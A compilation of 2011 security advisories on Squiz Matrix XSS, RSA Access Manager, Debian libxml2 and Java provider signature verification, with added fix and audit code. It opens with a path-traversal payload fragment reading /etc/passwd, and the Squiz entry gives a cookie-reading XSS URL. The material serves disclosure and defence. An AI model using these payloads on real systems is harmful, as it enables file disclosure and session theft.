# email=r...@d99y.com&mode=nassrawi../../../../../../etc/passwd/./././././././././././.
#   [the run of "/." segments continues for several thousand characters in the original]
#   ...&password=nassrawi
#
##
Squiz Matrix - Cross-Site Scripting Vulnerability
Squiz Matrix - Cross-Site Scripting Vulnerability
http://www.osisecurity.com.au/advisories/squiz-matrix-cross-site-scripting

Release Date: 06-Jun-2011
Software: Squiz - Matrix
http://www.squiz.net/

Squiz Matrix delivers a highly flexible and robust business integration engine and application development tools. It is an evolution, and the latest release, of the very successful MySource Matrix content management system.

Versions tested / affected: Squiz Matrix 4.0.6 / 4.2.2 and prior.

Vulnerability discovered: Cross-site Scripting

Vulnerability impact: Low - Remote content may contain JavaScript which is executed on the client. May be used to steal authentication information etc.

Vulnerability information: The remote page may contain JavaScript for XSS purposes, e.g. to read cookies. The parameter is correctly filtered using htmlentities; however, the filtered input is echoed within a script statement, allowing JavaScript injection provided the injected logic is complete.

Example:
http://[target]/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=00

Patched scripts include insert_dfn.php, insert_link.php, spell_checker_popup.php, colour_picker.php and tag_suggestion.php.

Recommendation: Upgrade to version 4.0.7 or 4.2.3.

Workaround: N/A.

Credit: This vulnerability was discovered by Patrick Webster.

Disclosure timeline:
01-Jun-2011 - Discovered during audit.
02-Jun-2011 - Notified vendor. Vendor response.
03-Jun-2011 - Vendor patched in CVS repository.
06-Jun-2011 - Vendor announces release of v4.0.7 and 4.2.3.
06-Jun-2011 - Disclosure.

We'd like to thank Squiz for their exceptional response time in responding to, and addressing, these issues.

About OSI Security:
OSI Security is an independent network and computer security auditing and consulting company based in Sydney, Australia. We provide internal and external penetration testing, vulnerability auditing and wireless site audits, vendor product assessments, secure network design, forensics and risk mitigation services. We can be found at http://www.osisecurity.com.au/
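The advisory's point is about output context, not missing filtering: PHP's htmlentities() with its default flags leaves the single quote alone, so a value echoed between single quotes inside a script element can still terminate the string. The added example below (not Squiz's or OSI Security's code; the parameter name and script fragment are modelled on the advisory's URL, the rendering functions are constructed) reproduces that behaviour with a Python mimic of htmlentities() and shows the context-correct alternative, a JSON string literal with the characters that could end the literal or the script element escaped.

```python
import html
import json
from urllib.parse import unquote

# Added example, not Squiz code. The query string is taken from the advisory's URL.
QUERY = "colour=';%20alert(document.cookie);%20var%20x='&pickerid=00"


def colour_param(query):
    """Return the URL-decoded value of the colour parameter (manual split so
    ';' inside the value is never treated as a separator)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "colour":
            return unquote(value)
    return None


def php_htmlentities(s):
    """Mimic PHP htmlentities() with its default ENT_COMPAT flags: & < > and
    the double quote are encoded, the single quote is NOT."""
    return html.escape(s, quote=False).replace('"', "&quot;")


def js_string_literal(s):
    """Encode a value for placement inside <script>: a JSON string, with every
    character that could close the literal or the script element escaped."""
    out = json.dumps(s)
    for ch in "<>&'":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out.replace("\u2028", "\\u2028").replace("\u2029", "\\u2029")


def render_vulnerable(colour):
    """HTML-entity filtering in a JavaScript string context (the advisory's pattern)."""
    return "<script>var colour='%s';</script>" % php_htmlentities(colour)


def render_fixed(colour):
    """The same output with context-appropriate encoding."""
    return "<script>var colour=%s;</script>" % js_string_literal(colour)


if __name__ == "__main__":
    value = colour_param(QUERY)
    print("vulnerable:", render_vulnerable(value))
    print("fixed:     ", render_fixed(value))
```

In the vulnerable rendering the injected quote closes the string and the rest of the payload becomes live code; in the fixed rendering the whole value stays a single string literal, and the `<`/`>` escaping also prevents a `</script>` inside the value from ending the element.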
ESA-2011-009 (revised): RSA, The Security Division of EMC, announces new fix for potential security vulnerability in RSA(r) Access Manager Server.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2011-009 (revised): RSA, The Security Division of EMC, announces new fix for potential security vulnerability in RSA® Access Manager Server.

Advisories Updated June 2, 2011

Summary:

RSA Access Manager Server has been updated with the resolution to a regression error found with the security patch previously released on March 10th, 2011. For additional details on the original issue refer to: https://knowledge.rsasecurity.com/scolcms/set.aspx?id=8854

CVE Identifier: CVE-2011-0322

Description:

RSA Access Manager Server contains a potential vulnerability due to improper input handling that could be exploited by malicious people to gain unauthorized access to protected resources.

Affected Products:

RSA Access Manager Server version 5.5.x
RSA Access Manager Server version 6.0.x
RSA Access Manager Server version 6.1.x

Recommendation:

RSA strongly recommends that all customers running RSA Access Manager Server versions 5.5.3, 6.0.4, and 6.1 apply the following updated security hot fixes, which contain the resolution to this issue, at the earliest opportunity. The hot fixes can be downloaded from SecurCare Online or by contacting RSA Security Customer Support.

Security Hot fix # 5.5.3.174 for RSA Access Manager Server version 5.5.3
Security Hot fix # 6.0.4.60 for RSA Access Manager Server version 6.0.4
Security Hot fix # 6.1.2.08 for RSA Access Manager Server version 6.1.2
Security Hot fix # 6.1.3.05 for RSA Access Manager Server version 6.1.3

The security hot fixes for RSA Access Manager Server are available immediately and are designed to address this potential issue. As of the date of this RSA SecurCare® Online Security Advisory, RSA is not aware of any security breaches that have occurred as a result of this vulnerability.

Common Vulnerability Scoring System (CVSS) Base Score:

The Common Vulnerability Scoring System (CVSS) base score for the items identified in this advisory is 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

RSA recommends that all customers take into account both the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with a particular security vulnerability. For more information on CVSS scoring, please see the Knowledge Base Article, Security Advisories Severity Rating, at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604.

Obtaining Downloads:

To obtain the latest RSA product downloads, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose download you want to obtain. Scroll to the section for the product download that you want and click on the link.

Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.

Obtaining More Information:

For more information about RSA Access Manager, visit the RSA web site at http://www.rsa.com/node.aspx?id=1186.

Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.

General Customer Support Information:
http://www.rsa.com/node.aspx?id=1264

RSA SecurCare Online:
https://knowledge.rsasecurity.com

EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details.
http://www.rsa.com/node.aspx?id=2575

SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
[SECURITY] [DSA 2255-1] libxml2 security update
Debian Security Advisory DSA-2255-1
secur...@debian.org
http://www.debian.org/security/
Thijs Kinkhorst
June 6, 2011
http://www.debian.org/security/faq

Package        : libxml2
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
Debian Bug     : 628537

Chris Evans discovered that libxml was vulnerable to buffer overflows, which allowed a crafted XML input file to potentially execute arbitrary code.

For the oldstable distribution (lenny), this problem has been fixed in version 2.6.32.dfsg-5+lenny4.

For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze1.

For the unstable distribution (sid), this problem has been fixed in version 2.7.8.dfsg-3.

We recommend that you upgrade your libxml2 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Java HotSpot Cryptographic Provider signature verification vulnerability
An attacker can add a cryptographic provider containing a cipher implementation signed by an untrusted certificate. The attacker can also create his or her own jurisdiction policy files signed by an untrusted certificate.

In order to achieve this, the attacker must first of all add a fake cryptographic provider (with index 1) with a special CertificateFactory.X.509 implementation. Such a provider is not required to be signed. This implementation can return the attacker's own untrusted certificate instead of one of the old JCE code signing certificates.

This vulnerability is caused by using CertificateFactory#getInstance without specifying the SUN provider in the code which is responsible for providers' (and jurisdiction policy) signature verification.

This applies to all versions of Java HotSpot SE 5 and 6.

More details and code samples here: http://java.zacheusz.eu/provider-signature-verif-vuln-2/273/

Regards,
Zacheusz Siedlecki
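As an added illustration (not code from the post, nor from the JDK), the unpinned CertificateFactory lookup the post describes beside the provider-pinned form, plus an audit method that lists any installed provider that would answer CertificateFactory.X.509 ahead of SUN; the class and method names are my own.

```java
import java.security.NoSuchProviderException;
import java.security.Provider;
import java.security.Security;
import java.security.cert.CertificateException;
import java.security.cert.CertificateFactory;
import java.util.ArrayList;
import java.util.List;

// Added example: weak lookup vs. provider-pinned lookup, with an audit of the
// installed provider order. Names are hypothetical, not JDK-internal code.
public final class PinnedCertificateFactory {

    // Weak form: "X.509" is resolved against the provider list in priority
    // order, so whichever provider sits at index 1 answers, including one
    // inserted at runtime with Security.insertProviderAt().
    static CertificateFactory unpinned() throws CertificateException {
        return CertificateFactory.getInstance("X.509");
    }

    // Hardened form: name the provider explicitly so a higher-priority
    // provider cannot substitute its own CertificateFactory.X.509.
    static CertificateFactory pinnedToSun()
            throws CertificateException, NoSuchProviderException {
        return CertificateFactory.getInstance("X.509", "SUN");
    }

    // Audit check: every provider listed here sits ahead of SUN and offers
    // CertificateFactory.X.509, so the unpinned lookup would be served by it.
    static List<String> providersShadowingSun() {
        List<String> shadowing = new ArrayList<String>();
        for (Provider p : Security.getProviders()) {
            if ("SUN".equals(p.getName())) {
                break; // providers after SUN have lower priority
            }
            if (p.getService("CertificateFactory", "X.509") != null) {
                shadowing.add(p.getName());
            }
        }
        return shadowing;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("unpinned lookup served by: " + unpinned().getProvider().getName());
        System.out.println("pinned lookup served by:   " + pinnedToSun().getProvider().getName());
        List<String> shadowing = providersShadowingSun();
        if (shadowing.isEmpty()) {
            System.out.println("no provider offers CertificateFactory.X.509 ahead of SUN");
        } else {
            System.out.println("WARNING: providers ahead of SUN for X.509: " + shadowing);
        }
    }
}
```

On a stock JRE both lookups report SUN and the audit list is empty; a non-empty list is the condition under which the unpinned lookup in the post no longer returns the JCE's own X.509 implementation.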